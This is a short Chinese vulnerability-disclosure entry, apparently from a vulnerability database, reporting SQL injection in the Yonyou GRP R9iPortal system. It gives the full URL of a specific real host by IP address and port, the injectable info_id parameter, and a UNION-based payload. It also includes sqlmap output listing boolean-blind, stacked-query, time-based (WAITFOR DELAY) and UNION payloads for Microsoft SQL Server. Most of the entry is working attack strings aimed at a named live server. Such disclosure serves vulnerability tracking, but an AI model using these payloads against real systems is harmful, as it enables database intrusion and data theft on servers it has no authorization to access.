用友GRP系统sql注射

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友GRP系统sql注射 ### 详细说明: 用友GRP系统sql注射 链接:http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=42 注射参数: Payload: info_id=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR(113)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(74)+CHAR(98)+CHAR(75)+CHAR (84)+CHAR(76)+CHAR(98)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(90)+CHAR(113)+CHAR(122 )+CHAR(98)+CHAR(120)+CHAR(113),78-- ### 漏洞证明: sqlmap resumed the following injection point(s) from stored session: --- Parameter: info_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=42 AND 4482=4482 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: info_id=42;WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=42 WAITFOR DELAY '0:0:5' Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: info_id=-7911 UNION ALL SELECT...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息